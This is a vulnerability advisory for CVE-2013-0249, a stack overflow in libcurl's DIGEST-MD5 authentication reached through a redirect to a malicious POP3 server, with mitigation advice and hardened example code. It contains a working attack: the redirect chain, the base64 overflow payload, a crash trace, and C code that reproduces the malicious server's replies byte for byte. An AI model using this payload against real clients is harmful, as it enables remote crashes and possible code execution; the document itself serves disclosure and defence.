Volema found a remotely exploitable buffer overflow in the libcurl POP3 and SMTP protocol handlers that leads to code execution (RCE): any libcurl-based client that can be made to talk to a malicious POP3 or SMTP server is affected. When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses data provided by the server without proper length checks, and that data is then appended to a local fixed-size buffer on the stack.

The vendor was notified and CVE-2013-0249 was assigned.

Attack Concept Outline

Assume the target application lets us issue custom HTTP requests through libcurl and follows redirects. We point it at a server we control, http://evilserver.com/, so it sends

GET / HTTP/1.0
Host: evilserver.com

The server answers with a redirect to a POP3 URL:

HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/

"Smart" curl interprets the redirect and connects to evilserver.com on port 110/TCP using POP3 (this needs CURLOPT_FOLLOWLOCATION, which such applications usually enable, and the default CURLOPT_REDIR_PROTOCOLS, which at the time still permitted POP3). The server answers

+OK POP3 server ready

curl sends

CAPA

and the server answers advertising DIGEST-MD5 as the only SASL mechanism:

+OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumbydumb POP3 server
.

so libcurl has no choice but to send

AUTH DIGEST-MD5

Then the server sends the payload, a base64-encoded DIGEST-MD5 challenge:

+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=

The overflow happens because the fixed-size "uri" buffer is 128 bytes and the "realm" buffer is also 128 bytes: the realm extracted from the challenge is appended into uri without a length check, so a realm that fills its own buffer no longer fits. Decoded, the challenge is

realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8
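The following is an added example, not libcurl's own code: it models the realm-to-digest-uri step the advisory describes, using the two 128-byte buffers named above, and sets the vulnerable (unchecked) construction beside a hardened one that fails closed. The function names, the bounded key/value extractor and the "pop" service string are this example's assumptions; the challenge it feeds in is constructed to match the decoded payload above.

```c
/* Added example, not libcurl code: models the realm -> digest-uri handling
 * behind CVE-2013-0249 with the 128-byte buffers the advisory names.
 * Function names and the "pop" service string are this example's own. */
#include <stdio.h>
#include <string.h>

#define REALM_MAX 128   /* fixed realm buffer, as in the advisory */
#define URI_MAX   128   /* fixed "uri" buffer, as in the advisory */

/* Pull the value following key (e.g. realm=") out of a decoded challenge,
 * stopping at end_char. This copy IS bounded: at most max_val_len-1 bytes. */
static int get_key_value(const char *chlg, const char *key, char *value,
                         size_t max_val_len, char end_char)
{
    const char *p = strstr(chlg, key);
    size_t i;
    if (!p)
        return 0;
    p += strlen(key);
    for (i = 0; *p && *p != end_char && i + 1 < max_val_len; i++)
        value[i] = *p++;
    value[i] = '\0';
    return 1;
}

/* Bytes "<service>/<realm>" needs, NUL included. The vulnerable pattern
 * appends service, "/" and realm into a URI_MAX buffer without this check,
 * so the 127-byte realm the bounded copy above leaves already needs 132. */
size_t digest_uri_len(const char *service, const char *realm)
{
    return strlen(service) + 1 + strlen(realm) + 1;
}

/* Hardened construction: fail closed instead of overflowing.
 * Returns 0 on success, -1 (and an empty out) if the URI does not fit. */
int build_digest_uri(char *out, size_t outlen, const char *service,
                     const char *realm)
{
    int n = snprintf(out, outlen, "%s/%s", service, realm);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed challenge shaped like the advisory's payload: realm is
 * realm_len 'A's, the other fields are those of the decoded payload. */
const char *make_challenge(size_t realm_len)
{
    static char chlg[512];
    char fill[256];
    if (realm_len >= sizeof fill)
        realm_len = sizeof fill - 1;
    memset(fill, 'A', realm_len);
    fill[realm_len] = '\0';
    snprintf(chlg, sizeof chlg,
             "realm=\"%s\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\","
             "algorithm=md5-sess,charset=utf-8", fill);
    return chlg;
}

/* Parse the realm, then build the digest-uri the safe way. Returns 1 when
 * the unchecked concatenation would have overflowed uri (and the safe
 * builder therefore refused), 0 when the URI fits. */
int challenge_overflows_uri(const char *chlg, const char *service)
{
    char realm[REALM_MAX];
    char uri[URI_MAX];
    size_t need;
    int rc;
    if (!get_key_value(chlg, "realm=\"", realm, sizeof realm, '"'))
        return 0;
    need = digest_uri_len(service, realm);
    rc = build_digest_uri(uri, sizeof uri, service, realm);
    /* both views must agree: overflow iff the safe builder refused */
    return need > URI_MAX && rc == -1;
}

int main(void)
{
    const char *chlg = make_challenge(128);   /* the advisory's case */
    printf("realm of 128 'A's over POP3: %s\n",
           challenge_overflows_uri(chlg, "pop") ? "would overflow uri, refused"
                                                : "fits");
    return 0;
}
```

Note that the realm copy itself is bounded; the bug is entirely in the second step, where a value that legitimately fills one 128-byte buffer is concatenated with a prefix into another 128-byte buffer. That is the pattern to look for when auditing similar code: a bounded parse followed by an unbounded sprintf/strcat into a sibling buffer of the same size.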

This is how it looks in gdb (curl 7.28.1, x86_64): the crash is inside libc, called from Curl_sasl_create_digest_md5_message(), and the saved return addresses above that frame have been overwritten with 0x41 ('A') bytes; the last readable frame, 0x656d616e72657375, is the ASCII string "username" read as a little-endian qword.

Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000
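The server side of the exchange above, written as an added example (this is not the original pop3d.py and not libcurl code): the malicious POP3 server's reply for each client line is a pure function, so the greeting, the CAPA listing that offers only DIGEST-MD5, and the "+ <base64>" challenge can be produced and inspected without a socket. The challenge is constructed to match the decoded payload above (a 128-byte realm of 'A's plus the same nonce, qop, algorithm and charset); the base64 encoder and the function names are this example's own.

```c
/* Added example, not the original pop3d.py: the malicious POP3 server's
 * replies for the CVE-2013-0249 exchange, as a function of the client line. */
#include <stdio.h>
#include <string.h>

static const char B64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Standard base64 (RFC 4648 alphabet, '=' padding); out needs 4*ceil(n/3)+1. */
static void base64_encode(const unsigned char *in, size_t n, char *out)
{
    size_t i, o = 0;
    for (i = 0; i + 2 < n; i += 3) {
        out[o++] = B64[in[i] >> 2];
        out[o++] = B64[((in[i] & 3) << 4) | (in[i + 1] >> 4)];
        out[o++] = B64[((in[i + 1] & 15) << 2) | (in[i + 2] >> 6)];
        out[o++] = B64[in[i + 2] & 63];
    }
    if (i < n) {                       /* 1 or 2 trailing bytes */
        out[o++] = B64[in[i] >> 2];
        if (i + 1 < n) {
            out[o++] = B64[((in[i] & 3) << 4) | (in[i + 1] >> 4)];
            out[o++] = B64[(in[i + 1] & 15) << 2];
        } else {
            out[o++] = B64[(in[i] & 3) << 4];
            out[o++] = '=';
        }
        out[o++] = '=';
    }
    out[o] = '\0';
}

/* Build the "+ <base64>" continuation: realm="A"*128 and the other fields
 * of the advisory's decoded challenge (constructed to match it). */
static void make_auth_challenge(char *out, size_t outlen)
{
    char chlg[512];
    char b64[1024];
    size_t len = 0;
    len += (size_t)sprintf(chlg, "realm=\"");
    memset(chlg + len, 'A', 128);      /* the oversized realm */
    len += 128;
    len += (size_t)sprintf(chlg + len,
                           "\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\","
                           "algorithm=md5-sess,charset=utf-8");
    base64_encode((const unsigned char *)chlg, len, b64);
    snprintf(out, outlen, "+ %s\r\n", b64);
}

const char *evil_pop3_greeting(void)
{
    return "+OK POP3 server ready\r\n";
}

/* Reply for one client line (CRLF already stripped). Returns NULL for
 * commands the attack does not need, so the caller can just close. */
const char *evil_pop3_reply(const char *client_line)
{
    static char reply[1024];
    if (strcmp(client_line, "CAPA") == 0) {
        /* advertise DIGEST-MD5 as the only SASL mechanism */
        snprintf(reply, sizeof reply,
                 "+OK List of capabilities follows\r\n"
                 "SASL DIGEST-MD5\r\n"
                 "IMPLEMENTATION dumbydumb POP3 server\r\n"
                 ".\r\n");
        return reply;
    }
    if (strcmp(client_line, "AUTH DIGEST-MD5") == 0) {
        make_auth_challenge(reply, sizeof reply);
        return reply;
    }
    return NULL;
}

int main(void)
{
    const char *client[] = { "CAPA", "AUTH DIGEST-MD5" };
    size_t k;
    printf("S: %s", evil_pop3_greeting());
    for (k = 0; k < sizeof client / sizeof client[0]; k++) {
        printf("C: %s\r\n", client[k]);
        printf("S: %s", evil_pop3_reply(client[k]));
    }
    return 0;
}
```

Running it prints the transcript shown above; the challenge line begins with the same "cmVhbG09IkFB" ("realm=\"AA") and ends with the same "LTg=" ("-8") as the captured payload, which is a quick way to confirm a reimplementation matches the original exploit's bytes.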

Original exploit: pop3d.py.

Mitigation

We recommend restricting your application to HTTP(S) with the CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS options, so that neither the initial URL nor a redirect can ever switch libcurl to POP3, SMTP or any other protocol the application does not use. libcurl should also be updated: the bug is fixed in 7.29.0.
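In a libcurl application the two options are set before curl_easy_perform(), each with a CURLPROTO_* bitmask, e.g. curl_easy_setopt(curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS) and curl_easy_setopt(curl, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS) (newer libcurl, 7.85.0 and later, also offers the string forms CURLOPT_PROTOCOLS_STR and CURLOPT_REDIR_PROTOCOLS_STR). The block below is an added, libcurl-free model of the check that CURLOPT_REDIR_PROTOCOLS makes libcurl apply to a Location: target, run against the redirect from the attack outline; it is not libcurl's code, and its flag values and function names are this example's own.

```c
/* Added example, not libcurl code: a stand-alone model of the scheme
 * allowlist CURLOPT_REDIR_PROTOCOLS enforces on a Location: target.
 * Flag values and names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum { PROTO_HTTP = 1, PROTO_HTTPS = 2, PROTO_POP3 = 4, PROTO_SMTP = 8 };

static const struct { const char *name; unsigned flag; } schemes[] = {
    { "http", PROTO_HTTP }, { "https", PROTO_HTTPS },
    { "pop3", PROTO_POP3 }, { "smtp", PROTO_SMTP },
};

/* Copy the URL's scheme (RFC 3986: ALPHA *(ALPHA / DIGIT / "+" / "-" / ".")
 * followed by ":") into out, lower-cased. Returns 0 with an empty out when
 * the URL carries no scheme (a relative Location) or the scheme is malformed. */
int url_scheme(const char *url, char *out, size_t outlen)
{
    size_t i;
    out[0] = '\0';
    if (!isalpha((unsigned char)url[0]))
        return 0;
    for (i = 0; url[i] && url[i] != ':'; i++) {
        unsigned char c = (unsigned char)url[i];
        if (!isalnum(c) && c != '+' && c != '-' && c != '.')
            return 0;
        if (i + 1 >= outlen)
            return 0;
        out[i] = (char)tolower(c);
    }
    if (url[i] != ':') {              /* ran out of input before the colon */
        out[0] = '\0';
        return 0;
    }
    out[i] = '\0';
    return 1;
}

/* Flag for a scheme name; 0 for anything not in the table, which is never
 * allowed (deny by default, like an unset CURLPROTO_* bit). */
unsigned scheme_flag(const char *scheme)
{
    size_t k;
    for (k = 0; k < sizeof schemes / sizeof schemes[0]; k++)
        if (strcmp(scheme, schemes[k].name) == 0)
            return schemes[k].flag;
    return 0;
}

/* May a redirect from a page with scheme `current` (lower-case) to
 * `location` be followed under the `allowed` mask? A scheme-less
 * (relative) Location keeps the current scheme, as the client resolves it. */
int redirect_allowed(const char *location, const char *current, unsigned allowed)
{
    char scheme[16];
    unsigned flag;
    if (!url_scheme(location, scheme, sizeof scheme)) {
        strncpy(scheme, current, sizeof scheme - 1);
        scheme[sizeof scheme - 1] = '\0';
    }
    flag = scheme_flag(scheme);
    return flag != 0 && (allowed & flag) != 0;
}

int main(void)
{
    unsigned http_only = PROTO_HTTP | PROTO_HTTPS;
    const char *loc = "pop3://x:x@evilserver.com/";   /* the advisory's redirect */
    printf("follow %s from http? %s\n", loc,
           redirect_allowed(loc, "http", http_only) ? "yes" : "no, blocked");
    return 0;
}
```

Two points matter when doing this outside libcurl (for example in a proxy or a pre-check in the application): the allowlist must be evaluated with the same scheme parsing the client itself uses, otherwise a parser difference lets a URL through that the client then interprets as pop3://; and the check applies to every hop of a redirect chain, not only the first Location: header, which is exactly why libcurl keeps CURLOPT_REDIR_PROTOCOLS separate from CURLOPT_PROTOCOLS.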